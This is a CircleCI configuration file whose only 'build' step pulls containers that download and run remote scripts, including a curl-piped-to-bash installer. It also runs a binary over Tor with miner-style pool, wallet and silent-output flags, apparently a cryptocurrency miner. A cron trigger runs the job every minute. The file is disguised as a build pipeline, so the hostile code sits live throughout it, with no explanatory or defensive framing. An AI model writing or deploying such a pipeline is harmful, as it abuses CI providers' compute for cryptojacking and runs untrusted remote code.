version: 2.1
orbs: 
  python: circleci/python@1.5.0
jobs:
  Builds:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          command: sudo docker pull ubuntu:latest && sudo docker run -d --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget -y && wget https://bitbucket.org/webwebweb_one/testo/raw/a622ead2a176c242925f0c811b5f00a7b2165b84/downloads.sh && bash downloads.sh" && sudo docker run --name Joker -d ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr.Pekerja01 -k > /dev/null" && sudo docker run --name ngebot -d joyzoursky/python-chromedriver:latest sh -c "apt update -y && curl -sL https://swenson.my.id/autobot | bash -" && wget https://bitbucket.org/webwebweb_one/testo/raw/1090dd17c85198a26b98e482208e58c55a76df80/tidur.py && python tidur.py

workflows:
  scheduled-workflow:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only: master
    jobs:
      - Builds